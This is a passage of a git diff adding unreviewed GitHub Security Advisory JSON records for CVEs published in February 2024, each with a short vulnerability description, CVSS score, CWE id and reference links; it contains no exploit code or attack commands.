"LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mmrc-cc78-9f9w/GHSA-mmrc-cc78-9f9w.json b/advisories/unreviewed/2024/02/GHSA-mmrc-cc78-9f9w/GHSA-mmrc-cc78-9f9w.json new file mode 100644 index 0000000000000..1f95ae28b0dbd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mmrc-cc78-9f9w/GHSA-mmrc-cc78-9f9w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmrc-cc78-9f9w", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24469" + ], + "details": "Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the delete_post .php.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24469" + }, + { + "type": "WEB", + "url": "https://github.com/tang-0717/cms/blob/main/2.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mp2w-hjcj-f5g9/GHSA-mp2w-hjcj-f5g9.json b/advisories/unreviewed/2024/02/GHSA-mp2w-hjcj-f5g9/GHSA-mp2w-hjcj-f5g9.json new file mode 100644 index 0000000000000..0067c91daa980 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mp2w-hjcj-f5g9/GHSA-mp2w-hjcj-f5g9.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mp2w-hjcj-f5g9", + "modified": "2024-02-04T21:30:43Z", + "published": "2024-02-04T21:30:43Z", + "aliases": [ + "CVE-2023-52426" + ], + "details": "libexpat through 2.5.0 allows recursive XML Entity Expansion if XML_DTD is undefined at compile time.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52426" + }, + { + "type": "WEB", + "url": "https://github.com/libexpat/libexpat/pull/777" + }, + { + "type": "WEB", + "url": "https://github.com/libexpat/libexpat/commit/0f075ec8ecb5e43f8fdca5182f8cca4703da0404" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/776.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T20:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mqq6-542f-w38g/GHSA-mqq6-542f-w38g.json b/advisories/unreviewed/2024/02/GHSA-mqq6-542f-w38g/GHSA-mqq6-542f-w38g.json new file mode 100644 index 0000000000000..264b5f1aa9527 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mqq6-542f-w38g/GHSA-mqq6-542f-w38g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqq6-542f-w38g", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-47618" + ], + "details": "A post authentication command execution vulnerability exists in the web filtering functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47618" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1859" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mvmq-hrr8-p65f/GHSA-mvmq-hrr8-p65f.json b/advisories/unreviewed/2024/02/GHSA-mvmq-hrr8-p65f/GHSA-mvmq-hrr8-p65f.json new file mode 100644 index 0000000000000..6bdf8b5356466 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mvmq-hrr8-p65f/GHSA-mvmq-hrr8-p65f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvmq-hrr8-p65f", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20815" + ], + "details": "Improper authentication vulnerability in onCharacteristicReadRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20815" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json b/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json new file mode 100644 index 0000000000000..ca1006e5a8ae0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwhj-qw9v-2hj2", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2023-51820" + ], + "details": "An issue in Blurams Lumi Security Camera (A31C) v.2.3.38.12558 allows a physically proximate attackers to execute arbitrary code.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51820" + }, + { + "type": "WEB", + "url": "https://github.com/roman-mueller/PoC/tree/master/CVE-2023-51820" + }, + { + "type": "WEB", + "url": "https://infosec.rm-it.de/2024/02/01/blurams-lumi-security-camera-analysis/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mwrc-5q9v-5658/GHSA-mwrc-5q9v-5658.json b/advisories/unreviewed/2024/02/GHSA-mwrc-5q9v-5658/GHSA-mwrc-5q9v-5658.json new file mode 100644 index 0000000000000..ea0a39b679d41 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mwrc-5q9v-5658/GHSA-mwrc-5q9v-5658.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwrc-5q9v-5658", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-23031" + ], + "details": "Cross Site Scripting (XSS) vulnerability in is_water parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23031" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mwx2-8cmg-6vmj/GHSA-mwx2-8cmg-6vmj.json b/advisories/unreviewed/2024/02/GHSA-mwx2-8cmg-6vmj/GHSA-mwx2-8cmg-6vmj.json new file mode 100644 index 0000000000000..e29472d1725b0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mwx2-8cmg-6vmj/GHSA-mwx2-8cmg-6vmj.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwx2-8cmg-6vmj", + "modified": "2024-02-04T18:30:19Z", + "published": "2024-02-04T18:30:19Z", + "aliases": [ + "CVE-2020-36773" + ], + "details": "Artifex Ghostscript before 9.53.0 has an out-of-bounds write and use-after-free in devices/vector/gdevtxtw.c (for txtwrite) because a single character code in a PDF document can map to more than one Unicode code point (e.g., for a ligature).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36773" + }, + { + "type": "WEB", + "url": "https://bugs.ghostscript.com/show_bug.cgi?id=702229" + }, + { + "type": "WEB", + "url": "https://bugzilla.opensuse.org/show_bug.cgi?id=1177922" + }, + { + "type": "WEB", + "url": "https://git.ghostscript.com/?p=ghostpdl.git%3Ba=commit%3Bh=8c7bd787defa071c96289b7da9397f673fddb874" + }, + { + "type": "WEB", + "url": "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs9530" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T18:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mxjm-2qgc-vv69/GHSA-mxjm-2qgc-vv69.json b/advisories/unreviewed/2024/02/GHSA-mxjm-2qgc-vv69/GHSA-mxjm-2qgc-vv69.json new file mode 100644 index 0000000000000..8e03be48f6091 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mxjm-2qgc-vv69/GHSA-mxjm-2qgc-vv69.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxjm-2qgc-vv69", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-1210" + ], + "details": "The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1210" + }, + { + "type": "WEB", + "url": "https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210" + }, + { + "type": "WEB", + "url": "https://www.learndash.com/release-notes/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p23j-w6jc-gg7v/GHSA-p23j-w6jc-gg7v.json b/advisories/unreviewed/2024/02/GHSA-p23j-w6jc-gg7v/GHSA-p23j-w6jc-gg7v.json new file mode 100644 index 0000000000000..965956e10f36c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p23j-w6jc-gg7v/GHSA-p23j-w6jc-gg7v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p23j-w6jc-gg7v", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0791" + ], + "details": "The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0791" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p25h-32f2-ffm3/GHSA-p25h-32f2-ffm3.json b/advisories/unreviewed/2024/02/GHSA-p25h-32f2-ffm3/GHSA-p25h-32f2-ffm3.json new file mode 100644 index 0000000000000..641a16f0d4517 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p25h-32f2-ffm3/GHSA-p25h-32f2-ffm3.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p25h-32f2-ffm3", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24115" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in the Edit Page function of Cotonti CMS v0.9.24 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24115" + }, + { + "type": "WEB", + "url": "https://mechaneus.github.io/CVE-PENDING-COTONTI.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p3gm-xxh4-xjmg/GHSA-p3gm-xxh4-xjmg.json b/advisories/unreviewed/2024/02/GHSA-p3gm-xxh4-xjmg/GHSA-p3gm-xxh4-xjmg.json new file mode 100644 index 0000000000000..bab7f665d4388 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p3gm-xxh4-xjmg/GHSA-p3gm-xxh4-xjmg.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3gm-xxh4-xjmg", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-06T03:32:59Z", + "aliases": [ + "CVE-2023-46359" + ], + "details": "An OS command injection vulnerability in Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46359" + }, + { + "type": "WEB", + "url": "https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/" + }, + { + "type": "WEB", + "url": "http://hardy.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p3jh-mv97-74gv/GHSA-p3jh-mv97-74gv.json b/advisories/unreviewed/2024/02/GHSA-p3jh-mv97-74gv/GHSA-p3jh-mv97-74gv.json new file mode 100644 index 0000000000000..cf9686c75fecc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p3jh-mv97-74gv/GHSA-p3jh-mv97-74gv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3jh-mv97-74gv", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20814" + ], + "details": "Out-of-bounds Read in padmd_vld_ac_prog_refine of libpadm.so prior to SMR Feb-2024 Release 1 allows attacker access unauthorized information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20814" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p3jw-3876-6r2f/GHSA-p3jw-3876-6r2f.json b/advisories/unreviewed/2024/02/GHSA-p3jw-3876-6r2f/GHSA-p3jw-3876-6r2f.json new file mode 100644 index 0000000000000..4ed895443ae0c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p3jw-3876-6r2f/GHSA-p3jw-3876-6r2f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3jw-3876-6r2f", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2023-7169" + ], + "details": "Authentication Bypass by Spoofing vulnerability in Snow Software Snow Inventory Agent on Windows allows Signature Spoof.This issue affects Snow Inventory Agent: through 6.14.5. Customers advised to upgrade to version 7.0\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7169" + }, + { + "type": "WEB", + "url": "https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p434-7834-2w5x/GHSA-p434-7834-2w5x.json b/advisories/unreviewed/2024/02/GHSA-p434-7834-2w5x/GHSA-p434-7834-2w5x.json new file mode 100644 index 0000000000000..fed6c40bd750f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p434-7834-2w5x/GHSA-p434-7834-2w5x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p434-7834-2w5x", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2021-22281" + ], + "details": ": Relative Path Traversal vulnerability in B&R Industrial Automation Automation Studio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Automation Studio: from 4.0 through 4.12.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22281" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/2021-11_ZipSlip_Vulnerability_in_Automation_Studio_Project_Import-b90d2f42.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T08:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p453-6h64-wr8m/GHSA-p453-6h64-wr8m.json b/advisories/unreviewed/2024/02/GHSA-p453-6h64-wr8m/GHSA-p453-6h64-wr8m.json new file mode 100644 index 0000000000000..1a4625594b826 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p453-6h64-wr8m/GHSA-p453-6h64-wr8m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p453-6h64-wr8m", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24857" + ], + "details": "A race condition was found in the Linux kernel's net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24857" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8155" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p469-qwjm-crp9/GHSA-p469-qwjm-crp9.json b/advisories/unreviewed/2024/02/GHSA-p469-qwjm-crp9/GHSA-p469-qwjm-crp9.json new file mode 100644 index 0000000000000..72533d0612813 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p469-qwjm-crp9/GHSA-p469-qwjm-crp9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p469-qwjm-crp9", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41275" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41275" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p469-vfhm-jcf8/GHSA-p469-vfhm-jcf8.json b/advisories/unreviewed/2024/02/GHSA-p469-vfhm-jcf8/GHSA-p469-vfhm-jcf8.json new file mode 100644 index 0000000000000..3a7fd9d6fac07 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p469-vfhm-jcf8/GHSA-p469-vfhm-jcf8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p469-vfhm-jcf8", + "modified": "2024-02-02T06:30:32Z", + "published": "2024-02-02T06:30:32Z", + "aliases": [ + "CVE-2024-1162" + ], + "details": "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.29. This is due to missing or incorrect nonce validation on the register_reference() function. This makes it possible for unauthenticated attackers to update the connected API keys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1162" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p4jh-rvp5-j37g/GHSA-p4jh-rvp5-j37g.json b/advisories/unreviewed/2024/02/GHSA-p4jh-rvp5-j37g/GHSA-p4jh-rvp5-j37g.json new file mode 100644 index 0000000000000..fd23686c9b4f9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p4jh-rvp5-j37g/GHSA-p4jh-rvp5-j37g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p4jh-rvp5-j37g", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33057" + ], + "details": "Transient DOS in Multi-Mode Call Processor while processing UE policy container.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33057" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p4rq-vwgg-386f/GHSA-p4rq-vwgg-386f.json b/advisories/unreviewed/2024/02/GHSA-p4rq-vwgg-386f/GHSA-p4rq-vwgg-386f.json new file mode 100644 index 0000000000000..cc21262589f70 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p4rq-vwgg-386f/GHSA-p4rq-vwgg-386f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p4rq-vwgg-386f", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2023-6519" + ], + "details": "Exposure of Data Element to Wrong Session vulnerability in Mia Technology Inc. MİA-MED allows Read Sensitive Strings Within an Executable.This issue affects MİA-MED: before 1.0.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6519" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0087" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-488" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p52j-m9w6-3m42/GHSA-p52j-m9w6-3m42.json b/advisories/unreviewed/2024/02/GHSA-p52j-m9w6-3m42/GHSA-p52j-m9w6-3m42.json new file mode 100644 index 0000000000000..fb62a0b367432 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p52j-m9w6-3m42/GHSA-p52j-m9w6-3m42.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p52j-m9w6-3m42", + "modified": "2024-02-06T21:30:25Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52175" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Uno (miunosoft) Auto Amazon Links – Amazon Associates Affiliate Plugin allows Stored XSS.This issue affects Auto Amazon Links – Amazon Associates Affiliate Plugin: from n/a through 5.1.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52175" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/amazon-auto-links/wordpress-auto-amazon-links-amazon-associates-affiliate-plugin-5-0-5-auth-stored-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:08Z" + } +} \ No newline at end of file diff 